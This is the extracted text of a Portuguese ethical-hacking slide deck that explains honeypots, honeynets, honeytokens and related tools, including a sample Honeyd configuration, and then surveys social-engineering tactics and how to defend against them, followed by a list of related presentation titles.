Recurso cuja única utilidade é serinvadido, permitindo a análise das ações do invasor e suaidentificação na rede.

Histórico

The Cuckoo's Egg Livro de Cliff Stoll, de 1990, conta como o

autor caçou o hacker alemão que invadiu ossistemas do Lawrence Berkeley Labs. Écitado como primeiro relato do uso dehoneypots para observar as ações de uminvasor.

Histórico

Honeynet project Projeto com fins não lucrativos de um grupo de

pesquisadores sobre o uso de honeypots. O trabalho do grupo rendeu outro livro, “Know Your Enemy”, onde são apresentadasanálises de invasões capturadas durante o projeto. Inclui instruções para a montagem dehoneynets.

Tipos de Honeypot

Honeypot de produção: Servem para distrair atividades maliciosas de máquinas da rede ou como mecanismo de alerta na rede de computadores.

Honeypot de pesquisa: Servem para monitorar e estudar os comportamento dos atacantes.

Objetivo de um Honeypot

Conhecer o inimigo (Blackhats), suas ferramentas, suas táticas e suas motivações;

Coletar dados e analisar ferramentas para aperfeiçoamento de sistemas de detecção de instrusão;

Controle das ações intrusivas

Níveis de interação

nível de atividade que o honeypot permite ao atacante:

Honeypots de baixa interação

Honeypots de alta interação

Baixa interação

apenas emulam serviços e sistemas operacionais;

fácil instalação;

riscos mínimos;

fácil descoberta por invasores

Alta interação

sistemas operacionais e serviços reais;

permite capturar mais informações;

instalação mais complexa;

risco maior

Baixa & Alta Interação

Baixa Interatividade Alta Interatividade

Emulam sistemas e serviços Executam as versões reais

Simples. Fácil gerenciamento Cuidados na instalação e configuração.

Atacante não tem controle Controle total

Ações limitadas, captura de tráfego

Captura de mais informações, incluindo ferramentas e comandos

Difíceis de iludir atacantes avançados/determinados

Difícil de destinguir de um sistema de produção

Localização de um Honeypot

Em frente ao firewall

Atrás do firewall (Intranet)

DMZ (Demilitarized Zone)

Localização de um Honeypot

Legalidade dos Honeypots

Armadilha:

coagir ou induzir alguém a fazer algo que normalmente não faria, ou seja, instigar a prática de um delito, pode acarretar processo judicial.

honeypot não induz ninguém, até porque muitas vezes é emulação do sistema de produção da empresa;

os ataques são por iniciativa do invasor; os honeypots não estão sendo usados para processar ninguém, e

sim como meio para novas descobertas.

Legalidade dos Honeypots

Privacidade: o sistema que o atacante está usando não

pertence a ele, portanto toda monitoração realizada no sistema não pode caracterizar quebra de privacidade.

Responsabilidade se o honeypot for comprometido e utilizado para

prejudicar outras redes pode acarretar processo civil.

Honeynet

Honeynets Redes que são utilizadas como honeypots Podem ser compostas simplesmente de um

gateway e de um máquina honeypot Permitem maior controle do tráfego

outbound do honeypot Facilidade na captura dos dados transmitidos

(todo tráfego passa pelo gateway)

Honeynet

É uma rede altamente controlada onde todo pacote que entra ou deixa a honeynet é monitorado, capturado, e analisado.

Qualquer tráfego que entra ou deixa a Honeynet é suspeito por natureza.

Honeynet é um tipo de honeypot de alta interação, utilizada principalmente para pesquisa.

Componentes de uma Honeynet

Roteador:Roteador: componente de interconexão e tem por função decidir qual o caminho que os pacotes que lhe são enviados deverão seguir

FirewallFirewall: componente de contenção de fluxo de dados que separa, restringe e analisa datagramas IP que passam por ele.

Funcionamento de uma Honeynet

Tornar a rede ativa: Criar contas de usuários; Enviar e-mails entre eles; Forjar documentos em alguns diretórios; Utilizar FTP ou TELNET; Utilizar alguns comandos que serão

armazenados em histórico

Logs de auditoria na Honeynet

Exemplo de envio de logs de auditoria para o Logserver

Tipos de Honeynets

ClássicaClássica:: Composta por sistemas reais (físicos)

Instalações específicas;

Sistemas operacionais variados e independentes

Honeynet Clássica

Vantagens: Dispositivos reais; Mais segurança pela descentralização dos honeypots

Desvantagens: Custo elevado; Dificuldades na instalação e administração; Complexidade para manutenção; Espaço alocado muito grande;

Tipos de Honeynets

VirtualVirtual:: Composta por Honeypots virtuais (máquinas

virtuais);

Uso de emuladores;

Todo ambiente composto por uma única máquina (sistemas operacionais emulados)

Honeynet Virtual

Vantagens: custo reduzido; gerenciamento facilitado; facilidade na instalação e administração;

Desvantagens: limitação nos tipos de sistemas operacionais

oferecidos pelos softwares de virtualização; possibilidade de comprometimento do software

de virtualização; instabilidade pelo uso exaustivo de memória

Honeytokens

Conceito Honeytokens seguem a tendência inversa das

honeynets: são informações cujo únicoobjetivo é serem acessadas indevidamente.

Honeytokens são grandes aliados na detecção de intrusos e não trazem os mesmos riscos ecustos dos honeypots

Honeytokens

Conceito Para que sejam úteis, é imprescindível contar com

uma estrutura de detecção adequada. IDS Network Based

Pode detectar o tráfego de honeytokens na rede. Não pode detectar honeytokens transmitidos criptografados

IDS Host Based Não sofre problemas com a criptografia Deve estar habilitado em toda máquina que tem

honeytokens Pode ser simplesmente a auditoria de acesso do sistema

operacional ou do gerenciador de banco de dados.

Honeytokens

Usuários Usuários com aparentes altos privilégios

podem ser criados com senhas extremamente complexas, reduzindo o risco de utilização e permitindo maior foco pelo IDS.

Usuário membro do grupo “administrators” no Windows

Senha forte pode ser montada utilizando-se caracteres gerados pelo uso da tecla ALT

Utilitários utilizados para criar Honeypots de baixa e média interação

HoneydHoneyd

Um dos principais aplicativos para construção de honeypots;

Sistemas Unix;

Emula vários sistemas operacionais;

Assumir identidade de um IP que não esteja sendo utilizado;

Pode monitorar todas as portas baseadas em UDP e TCP;

Honeyd Exemplo de configuração do Honeyd:

# Example of a simple host template and its binding

create default

set default personality “FreeBSD 2.2.1-STABLE”

add default tcp port 80 “sh scripts/web.sh”

add default tcp port 22 "sh scripts/test.sh $ipsrc $dport"

add default tcp port 113 reset

add default tcp port 1 reset

set default uid 32767 gid 32767

bind 192.168.1.15 default

set 192.168.1.15 uptime 1327650

#add default tcp port 23 proxy 192.168.1.13:23

#set default subsystem “/usr/sbin/httpd”

Honeyd

KFSensor

Honeypot comercialPossui diversos serviços disponíveis para

se habilitarTambém simula muitos tipos de cavalos

de tróiaFácil utilização

Specter

É instalado em um único equipamentoHoneypot de baixa interaçãoPode emular diferentes sistemas

operacionais, tais como Windows XP, Linux, AIX e outros

Configuração mais complexa

Valhala Honeypot

Honeypot de baixa e média interação Mais leve Único com versão em português Configuração simples e intuitiva Possui diversos servidores, tais como WEB,

FTP, SMTP, TFTP, FINGER, TELNET. Desenvolvido por Marcos Flávio Assunção http://valhalahoneypot.sourceforge.net

Valhala Honeypot

Vulnerabilidades Humanas (e Físicas)

Pergunta

Se a segurança é maior, por que os ataques de sucesso aumentam cada vez mais?

Resposta

Pois sabe-se que a melhor chance de burlar um sistema seguro é atacar o elo mais fraco da corrente...

o USUÁRIO

Engenharia Social

Conhecida como “Arte de enganar”

Consiste em atacar o elo mais fraco de qualquer sistema: o ser humano

Demonstrada no filme “Takedown”, que conta a história do hacker Kevin Mitnick.

“ – Olá, esqueci minha credencial.“Kevin Mitnick, Takedown

O que temos a ver com isso?

Pessoas Físicas

- Roubo de conta bancária - Golpes e vigarismo - Sequestros

Empresas

- Fatores de risco mal calculados - Vazamento de informações - Perdas financeiras

Tipos de ataques

Internet / Telefone- Phishing- Identity Theft- Fake Mail

Pessoalmente- Shoulder Surfing- Dumpster Diving- Rush Authentication- Identity Theft

Dumpster Diving

Utilidade: Obter documentos com informações sensíveis, no caso foi encontrado papel com usuário e senha anotado.Marcos Flávio Araújo Assunção

Fake Mail

Phishing Scam

O que é Phishing?

Phishing = Pescaria Consiste em enviar e-mails atrativos e curiosos com links para programas maliciosos ou incitando atividade enganosa

Quem pratica o Phishing é normalmente chamado de Phishing “Scammer”.

Crescimento do Phishing

Exemplos de Phishing

Nigerian ScamsNigerian Scams

Manipulação avançada com Manipulação avançada com a Engenharia Sociala Engenharia Social

Manipulando o ser humano

Objetivo: Conquista do sentimento Autor: engenheiro social Meios: telefone, internet, físico. Pontos principais:

CuriosidadeConfiançaSimpatiaCulpaIntimidaçãoOrgulho

Curiosidade

Caminho mais fácil E-mails curiosos Promoções tentadoras Caso:

O CD de fotos no elevadorPendrive “perdido”Outdoor Celular a 1 real

Confiança

Quando há confiança, o engenheiro social age com mais facilidade.

Como essa confiança é gerada? “Autenticação” por conhecimento prévio Fake Mail Caso:

Roubando com autorizaçãoO detetive e a atendente da locadora

Simpatia

Adoramos pessoas simpáticas. Isso é um fato. A dificuldade de se dizer “não” quando alguém

é simpático conosco. Está diretamente ligada ao orgulho Caso:

Simpatia pela bajulação

CulpaCulpa

A culpa é um excelente argumento A culpa é um excelente argumento para se obter informações.para se obter informações.

O desespero de um culpado pronto O desespero de um culpado pronto para ajudar.para ajudar.

Casos:Casos:O novato que apagou o que não deviaO novato que apagou o que não deviaPrestação de favorPrestação de favor

Intimidação

Objetiva gerar medo Objetiva gerar medo Tom de voz firmeTom de voz firme““Faça isso agora“Faça isso agora“Inclui ameaças à negaçãoInclui ameaças à negaçãoCaso:Caso:

Relatório terceirizado atrasadoRelatório terceirizado atrasado

Como cair nos truquesComo cair nos truques

Baixo “Desconfiometro”Baixo “Desconfiometro”Não destruir documentosNão destruir documentosRevelar dados sem consultaRevelar dados sem consultaDesconfiança passivaDesconfiança passivaAcessar sistemas duvidososAcessar sistemas duvidososCuriosidade em excessoCuriosidade em excessoFalar sobre dados confidenciais Falar sobre dados confidenciais

fora do ambiente da empresafora do ambiente da empresa

Como se proteger?Como se proteger?

TreinamentosTreinamentosWorkshopsWorkshopsEstudo de casosEstudo de casosClassificação das Classificação das

InformaçõesInformaçõesPenTestPenTestPolíticas rígidasPolíticas rígidas

Ethical Hacking

Marcos Flávio Araújo AssunçãoCertified Ethical Hacker mflavio@defhack.comwww.defhack.com.br

ethical hacking slide completo

Technology

seo como ferramenta de growth hacking

o t recopilar información i u t con kali linux 2.0 a r...

ethical limits in the assisted human reproduction

oficina: growth hacking

cidades inteligentes - civic hacking - open data

growth hacking - teaser

growth hacking para apps e serviços

ethical hacker

seminário de growth hacking

mindthesec forum 2015 - hacking não verbal

hacking, ian - ontologia histórica

“web spiders” – automação para web hacking

boas práticas em microfinança - ethical savings

hacking político

ehtical hacking

hacking linux

14 e 15 de marÇo em sÃo paulo - anppd cnppd 202… ·...

guia definitivo growth hacking

ethical hacking - apresentando os riscos da cyber security...

ramos neto, isaac rodrigues - a prática do ethical hacking...